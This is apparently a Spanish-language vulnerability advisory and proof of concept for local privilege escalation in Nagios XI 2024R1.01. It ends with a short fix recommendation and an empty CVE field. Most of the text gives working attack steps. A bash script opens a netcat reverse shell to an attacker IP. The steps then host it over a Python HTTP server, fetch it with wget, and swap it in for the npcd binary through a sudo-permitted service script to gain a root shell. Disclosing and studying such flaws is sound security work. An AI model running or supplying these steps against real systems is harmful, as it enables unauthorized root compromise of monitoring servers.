
Escalada de privilegios en Nagios 2024R1.01
CVE descubierto por: Jarod Jaslow (MAWK)
Como el usuario "NAGIOS," cree un archivo en la máquina del atacante con el siguiente contenido:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Aloje el archivo en la máquina del atacante mediante un servidor HTTP de Python:
python3 -m http.server 8000

Inicie un servidor de escucha Netcat (NC) en la máquina del atacante:
nc -nlvp 4445

Obtenga el archivo desde la máquina del atacante:
wget http://<Attacker IP>:8000/npcd

Ejecute los siguientes comandos para escalar privilegios y recibir una conexión como root:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


Se recomienda restringir la capacidad del usuario "NAGIOS" para escribir en los ejecutables de servicios de Nagios que se ejecutan como root. Esto se puede lograr implementando permisos de archivo y controles de acceso más estrictos para los directorios y archivos relevantes asociados con los servicios de Nagios.
Esto debería corregirse en los nuevos lanzamientos
CVE: